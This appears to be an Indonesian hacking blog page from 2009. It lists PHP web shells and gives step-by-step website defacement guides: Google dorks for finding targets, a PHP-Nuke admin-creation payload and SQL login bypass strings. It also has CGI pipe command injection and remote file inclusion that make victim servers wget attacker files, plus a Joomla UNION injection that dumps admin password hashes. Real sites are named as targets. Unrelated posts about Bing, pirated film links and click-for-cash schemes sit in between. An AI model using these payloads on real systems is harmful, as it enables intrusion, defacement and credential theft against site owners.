. : : x generation komputer : : .: 2009

HADIAH ULTAH INDONESIA KE-64 DARI IrFan_1933

Kumpulan Shell r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - c99 - shell archive - php shells - php exploits - bypass shell

C99 Shell  [ ~ ]

R57 Shell  [ ~ ]

C100 Shell  [ ~ ]

Tryag Bypass  [ ~ ]

Cgi.Pl  [ ~ ]

Safe0ver Bypass Shell  [ Evilc0der ]

Sosyete Safe Mode Bypass Shell  [ Sosyete ]

Erne Bypass Shell  [ Erne ]

Liz0zim Bypass Shell  [ Liz0zim ]

Stres Bypass Shell  [ Stres ]

Kacak Fso Shell v1.0  [ Kacak ]

Ekin0x Shell  [ Ekin0x]

Heykir Shell  [ The-Bekir ]

Spy Bypass Shell  [ Kruis ]

Zehir4 Asp Shell  [ ~ ]

Sim Attacker Shell  [ ~ ]

MySQL Shell  [ ~ ]

Remview Shell  [ ~ ]

Ajax Command Shell  [ ~ ]

AntiChat Shell  [ AntiChat.Ru]

AspX Shell  [ LT ]

Worse Linux Shell  [ Shany ]

Dive Shell  [ Experor Hacking Team ]

Efso Asp Shell  [ Ejder ]

cara daftar ( submit ) website atau blog di bing.com

Bagaimana cara submit blog, website ataupun forum kita di bing?? inilah cara memasukkan situs kalian di bing, search engine terbaru dari microsoft.

Cukup dengan memasukkan (submit) URL situs website/blog kalian di sini

UPDATES
* Submit your site URL to Bing via http://www.bing.com/docs/submit.aspx

persaingan bing.com Vs google.com Dan yahoo.com

Siapa yang tidak kenal dengan Microsoft? Salah satu perusahaan raksasa yang sudah sejak tahun 90-an berjaya dan menguasai dunia teknologi (IT).

Microsoft terus melebarkan sayapnya setelah terbilang sukses dengan sistem operasi Windows buatannya. Kini dunia yang akan dicoba untuk ditaklukkan adalah dunia maya, tepatnya mesin pencari.

Beberapa hari yang lalu Microsoft meluncurkan Bing, sebuah mesin pencari di internet miliknya yang akan dirilis secara resmi pada tanggal 3 Juni besok. Bing sendiri merupakan kelanjutan dari Windows Live Search yang oleh banyak pihak dinilai gagal untuk menandingi keperkasaan raksasa mesin pencari Google.

Lalu apa yang membuat Microsoft kembali menghidupkan tantangannya kepada dua mesin pencari, Google dan Yahoo, yang sudah melekat di hati para pengguna?

Mesin pencari di internet merupakan 'kue' yang sangat potensial di dunia maya. Lihat bagaimana Google menjadi sebuah perusahaan raksasa dengan awalnya hanya bermodalkan sebagai portal mesin pencari. Dan lihat juga bagaimana Yahoo yang harus mengalami kesulitan keuangan sekaran ini padahal pada era 90-an Yahoo dikenal sebagai jawara mesin pencari.

Sekarang berbicara tentang Bing, apa yang diunggulkan oleh Bing yang tidak bisa temui di Google dan Yahoo:

Selain tampilan antarmuka yang baru, Bing juga menambahkan kemampuan untuk menampilkan web hasil pencarian sebelum pengguna mengunjungi langsung web yang dituju. Sekaligus juga adanya fitur pembagian pencarian yang dihasilkan berdasarkan kategori topik.

Bisakah Bing menandingi Google yang dikenal sebagai mesin pencari yang mampu menampilkan hasil yang sangat lengkap dan tool-tool unik seperti Street View dan juga menandingi Yahoo yang dikenal sebagai mesin pencari yang terintegrasi dengan konten jaringan Yahoo yang cukup lengkap?

Star Trek 2009 ( CAM ) The Future Begins

Part 01
Part 02
Part 03
Part 04
Part 05
Part 06
Part 07
Part 08
Part 09
Part 10
Part 11
Part 12
Part 13

Transformers 2 Revenge Of The Fallen CAM XVID 2009

Part 01
Part 02
Part 03
Part 04
Part 05
Part 06
Part 07
Part 08
Part 09
Part 10
Part 11
Part 12
Part 13
Part 14
Part 15
Part 16

Street Fighter The Legend of Chun Li (2009) dvdrip

Part 01
Part 02
Part 03
Part 04
Part 05
Part 06
Part 07
Part 08
Part 09
Part 10
Part 11
Part 12
Part 13

Mamfaatkan Kapasitas Gmail Sebagai Penyimpan Data...!

Jangan sia-siakan kapasitas GMail!!!Jangan cuma pakai jatah kapasitas kotak surat GMail. Pakai juga untuk menyimpan file lain sehingga file itu bisa diakses melalui GMail.Saat ini kapasitas GMail lebih dari 7,3Gb. Kapasitas itu terus-menerus bertambah dari detik ke detik. Sampai kapan? Entah sampai kapan. Nikmati sajalah.Dari seluruh e-mail yang masuk hanya memenuhi 1% saja, lantas untuk apa yang 99% ? Untuk itu kita taruh file GMail langsung di Windows Explorer. Jadi seolah-olah jadi Drive di Explorer. File yan gingin ditaruh, Tinggal taruh disitu.Untuk memunculkanya ada softwarenya. Software gratisnya itu bernama GMail Drive Ukuranya kecil betul, hanya 153Kb dan bisa didownload di link ini DOWNLOADInstalasinya mudah.

Urai paket GMail Drive, lalu jalankan instalasinya. Isikan informasi akun anda. Sudah selesail.Cara pakainya tak kalah mudah tinggal drag filenya ke GMail Drive.Ada tips agar filenya tidak tercampur dengan e-mail. Buatlah filter yang dikirim via GMail Drive. Caranya kayak gini:Buka akun GMail kamu. lalu klik [pengaturan]->[Label]. Masukan nama label dengan "File Simpanan" klik [Buat]Setelah itu, klik [Buat Filter Baru]. Isikan bagian subjek dengan "GMAILFS". Klik [Langkah Berikutnya]. Di halaman yang kemudian muncul, pilih [Gunakan Label Ini:] Di kotak sebelahnya, pilih [File Simpanan]

langkah-langkah deface website lengkap...!

udah lama nih udah nda nge posting tentang hacking maklum lagi sibuk
cari dollar dan di sini saya akan menjelaskan berbagi macan jenis deface
yang skarang di pergunakan para hacked indo untuk hack website orang
malaysia untuk membela manohara....! (seperti emould.com.cn dan hacked by x-blank )

Deface situs php nuke

Buka situs www.google.com
kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.target.com/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.
Masih ingat kan ?
id=budakbaonk => liat yg diatas tadi
password=bajingan => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg ! He he he he he
Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),
Kolom title =>

Kolom content =>

Kolom expiration => unlimited
trus klik tab add messages yg ada dibawah
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,
misal www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface lu coba klik tab refresh yg ada
diatas yg disamping url/browsing lu

========================================

Deface asp/iis dgn menggunakan win 98

1. Klik Icon “My Computer” di komputer kamu.
2. Cari Icon “Web Folder” didalam My Computer Itu.
3. Klick lagi Icon “Add web folder” dan akan muncul
“Type the location to add”.
4. Ketiklah nama situs yang akan kita deface/tambahkan filenya
misalnya http://www.52down.com. Kemudian klik Next.
5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish.
kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface
jadi kamu musti cari target lain.
6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat
ada file http://www.52down.com. Klik file situs tsb.
7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html,
lu buat dulu file html di ms.fronpage trus simpan di kompi lu)
terus copy kemudian kembali lagi ke file http://www.52down.com,
paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya
udah dipath sama adminnya, jadi kamu musti cari target lain.
8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing
misalnya http://www.52down.com/Test.html
9. Kalau mau mencari target caranya cari di www.google.com terus
ketik allinurl:.com/index.asp atau allinurl:.org/default.asp
tinggal kreatifitas kamu mencari target.
Atau bisa cari target di http://www.zone-h.org/en/defacements/
klik mirror yg sebelah kanan (yg windows 2000),
Perhatikan target nya => Defacer: Infektion Group
Domain : www.namatarget.com <<>

=======================================

cara membuat html :

Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,
trus pilih enable hyperlink, trus pilih color background,
pilih warna hitam, trus ok
Trus pilih tab center yg diatas (rata tengah) kayak ms.word,
ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),
pilih warna merah, kalo udah tulis Hacked by nama nick kamu,
tekan enter 3 kali Trus ketik
Hey Admin……..do you a need help ? trus enter sekali,
trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali
Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,
trus pilih from file…., di file name ketik
http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu
trus ok Kalo mau pake musik pilih tab format diatas,
trus pilih backgrounds trus pilih tab general,
pada “background sound location” ketik
http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu
trus ok Utk nyimpan nya pilih tab file diatas, pilih save as…
file name : Hacked atau nama nick kamu, trus ok
Catatan : seandainya waktu lu nyimpan file ada keluar
“save embedded file” pilih “set action” trus pilih “dont save” trus ok
Utk meliat hasilnya pilih tab preview dibagian bawah.

=======================================

Deface guestbook (buku tamu)

Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook
(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak
semua guestbook bisa dideface.
Langkah2 nya

I. Cari target guestbook di www.google.co.id dgn mengetikkan
site:my guestbook.php atau site:com bukutamu.php

II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php
maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.
Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,
cukup identitas palsu aja.

contoh :

Nama : boneka lucu
Email : boneka_2005@yahoo.com
Website : www.boneka-lucu.com
Asal : toko boneka
Komentar :

Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara
SQL Injection ke guestbook tsb, disitu kita akan memasukkan
sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?
ntar dimarah mama). Trus klik tombol “submit” atau tombol apa
namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus
ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing
lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.
Berarti guestbook tsb bisa dideface.

Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan

berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !
cari target yg lain.

III. Kalo udah muncul gambar yg kita masukkan tadi,
buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.

contoh :

Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.

Catatan :
Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai
keinginan lu.

IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb.
Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu.
Nah…muncul deh hasil deface kita di guestbook tsb.

======================================

deface asp dgn sql injection

1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target www.namatarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url lu

======================================

deface cgi

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|

=======================================

deface cgi II

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack” > /usr/home/web/users/a0004481/html/adspro/jh.html|
http://www.sports-media.org/adspro/jh.html

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm << page="top.htm|pwd|">>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< html =""> http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack”>decae.html|&cart_id=9721374.5730
http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20

======================================

deface php dgn injection

http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4
itu file aslinya
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
itu bug nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
jadi index.php?name=PNphpBB2&file=index&c=4 dibuang
cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak command unix masukin
wget http://geocities.com/nusantarajaya_2004/arai.html
cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html

http://www.narnia-chroniken.de <<< phpbb_root_path="http://geocities.com/sandal_karet/script/arai2.jpg?">

========================================

deface php dgn injection II

http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php
itu file aslinya
http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak masukin: pwd
jadi pics%2Fom%2Findex.php dibuang
cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html
cara liat nya http://www.giphted.com/arai.html

=========================================

deface phpbb/forum

http://www.bpmpt.go.id/forum/index.php
itu file aslinya
includes/db.php?phpbb_root_path=
itu bug nya
jadi index.php dibuang
http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?
dikotak masukin: pwd
Kalo keluar “Hacking attempt” artinya dipath
Tapi kalo berhasil, terserah lu mau di apain……

==========================================

deface phpbb/forum II

http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
itu file aslinya
&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
itu bug nya

cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

cara wget nya ada 3 cara :
1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls
2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm
3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls
biasa nya cara ke 3 yg berhasil.

cara liat nya http://singapore.bluejackings.net/arai.html

=========================================

cara liat fs tanpa login

http://www.friendster.com/useropen.php?uid=
<<<<<<>

===========================================

deface php dgn injection III

langsung di tembak aja bos biar ga lama2
www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
kolo berhasil seperti biasa
cmd sql php injection
buat nyari akses ke foldernya
cmd => find / -perm 777 -type d
klo foldernya permision denied berarti kita ga bisa apa2 di folder itu
cari folder yg ga ada tulisan perm
ambil contoh ini
http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
cari akses foldernya [commndnya diatas]
cmd => find / -perm 777 -type d
bakal makan B/w
jd sabar aja
=== contoh -perm denied ==
find: /mnt/drive2/lost+found: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
itu artinya no akses
kita cari yg lain
tp usahakan foldernya yg /var/www/
klo ga ada juga gpp
ada yg lain
/home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg bisa
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]
[command dasar OSnya] => wget, dir, cat, rm, rv -rf dll
skarang kita wget
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html
coba lo masukin
ke cmdnya
———————————————————
–10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html
=> `arai.html’
Resolving www.geocities.com… 66.218.77.68
Connecting to www.geocities.com[66.218.77.68]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6,021 [text/html]
0K ….. 100% 98.21 KB/s
10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021]
———————————————————
itu artinya sukses ke save
karena httpdocs
gampang cara liatnya
/home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[file deface lo]
contoh www.hdca.org/downloads/arai.html
selsai deh
gampang kan

http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/
http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=
http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=id;pwd
http://img143.imageshack.us/img143/6782/hacked8lc.jpg
http://www.sobatpadi.net/download/

http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

memanfaatkan google untuk curi password website...!

cara sangat mudah cukup copas perintah berkut :

"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

di google.co.id ato google.com

kemudian lihatlah semua web yang memiliki bug pasti tercetak oleh omm kesayanganku yaitu omm google...!

segitu aja dulu aja ya....!

hack ip untuk para hacker

hack ip ini sering saya gunakan pada saat saya ingin main curang pada beberapa
media yang memberikan uang kepada saya seperti kumpulblogger.com ato adsense

untuk hack IP address (agar IP address kita berubah, caranya gampang bgt).
pergi kesini, dan tinggal masukkan URL yang anda tuju:

http://anonymizer.nntime.com/

download pengubah IP address disini

http://www.unrestrictedsurf.com/

Cuma segitu aja, semoga berguna!!

meningkatkan pengunjung sekaligus berburu dollar

Pertama kali blog anda dipublikasikan, anda pasti selalu berharap ada pengunjung yang bertamu. Namun kadang-kadang pengunjung yang diharapkan itu tidak sesuai harapan. Semua masalah itu umum dilalui oleh peblogger.
Sekarang anda jangan khawatir tentang jumlah pengunjung yang datang bertamu ke blog anda. Hebatnya lagi selain dibanjiri oleh pengunjung, anda juga dapat bonus berupa Dollar. Jangan lewatkan kesempatan emas ini..Ikuti yuk cara-caranya.
Lihat banner dibawah ini, dapat anda klik untuk melakukan pendaftaran. Mudah kok...tinggal memasukan alamat email anda, maka anda telah terdaftar di Venifine. Coba yah...!

1. Register/Daftar ke Vinefire.com

vinefire merupakan sebuah program yang menawarkan bagi hasil uang sebanyak $50/Hari bagi free member dan $100/Hari bagi Premium member (untuk menjadi premium member hanya dengan membayar $5 saja), anda dapat bagi hasil uang hanya dengan melakukan klik link ($0,45), vote link($0,55), dan add link($0,12). program ini akan membayar membernya pada tanggal 31 Januari 2010.
isi semua data - data anda dengan benar.

2. Setelah menjadi member di Vinefire.com anda tinggal masuk ke menu add link, masukkan link blog anda beserta judulnya, lalu klik tombol add link. Lakukan cara tersebut sampai seluruh link yang anda miliki masuk ke Vinefire.com. Coba anda bayangkan apabila pada saat anda memasukkan link tersebut member vinefire.com yang aktif sebanyak 50 orang , yang sedang mencari uang tambahan dengan mengklik link yang ada di situ juga termasuk link anda, anda sudah mendapatkan 50 pengunjung di blog anda, apalagi kalau member vinefire.com sedang banyak - banyaknya maka bersiap - siaplah blog anda kebanjiran pengunjung. anda dapat add link di vinefire.com berkali - kali dalam satu hari dalam rentang waktu 40 detik, asalkan link yang anda masukkan berbeda, trik untuk mengatasi hal ini adalah, anda posting sebanyak - banyaknya di blog anda, maka setiap posting yang anda buat pasti berbeda - beda linknya sesuai label atau judul yang anda masukkan, gunakan link tersebut untuk di add link di vinefire.com , bayangkan bila anda memiliki 100 postingan dan anda memasukkan 100 link ke vinefire.com dalam selang waktu 40 detik, dan member vinefire.com yang online sedang banyak, waaaaah mendapatkan pagerank terbaik untuk blog anda bukan lah hal yang sulit. udah blog kita terkenal dapet duit lagi $50 /hari..! Mantaaap! sudah terbukti..!
Ayo...daftar segera...dan siap-siap anda akan kebanjiran pengunjung...!!!
Anda tidak perlu berpikir masalah dollarnya..sebagai peblogger, meningkatnya jumlah pengunjungpun merupakan kebanggan sendiri.

Sql Injection pada Joomla (ternyata joomla punya kelemahan juga ya...!)

Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ' ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1'

Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds' dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* --> errornya sama
…
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* --> errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+jos_users

lihat paling akhir dari baris tersebut,
from+jos_users

jos_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,

Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.

Lihat angka 2 di dalam tag :<br /><br /><title>2 (18)

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini ...
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+jos_users

perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :

5.0.33 (18)

Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D.

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut ...

admin (18)

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

cara dapatkan rupiah dari kumpulblogger

Kumpul Blogger merupakan situs yang dapat anda jadikan media untuk mendapatkan hasil tambahan berupa rupiah. Caranya tidak sulit, daftar kemudian sisihkan ruangan pada blog anda untuk memasang iklan yang bentuk penampilannya telah ditentukan oleh pihak kumpul blogger.
Bergabunglah dengan kumpul blogger...!! Daftarkan segera...!!
Caranya...??

Buka alamat situs ini : http://kumpulblogger.com
Klik Register yang terdapat dibagian kanan atas untuk daftar
Masukan email anda yang juga sebagai user login anda dan isikan juga dua kata yang tampil dibawahnya pada kotak yang disediakan
Klik tombol register
Tunggu sebentar sampai anda diminta untuk mengecek email
Buka email anda kemudian cek email dari kumpul blogger untuk mendapatkan kode/pasword untuk login.
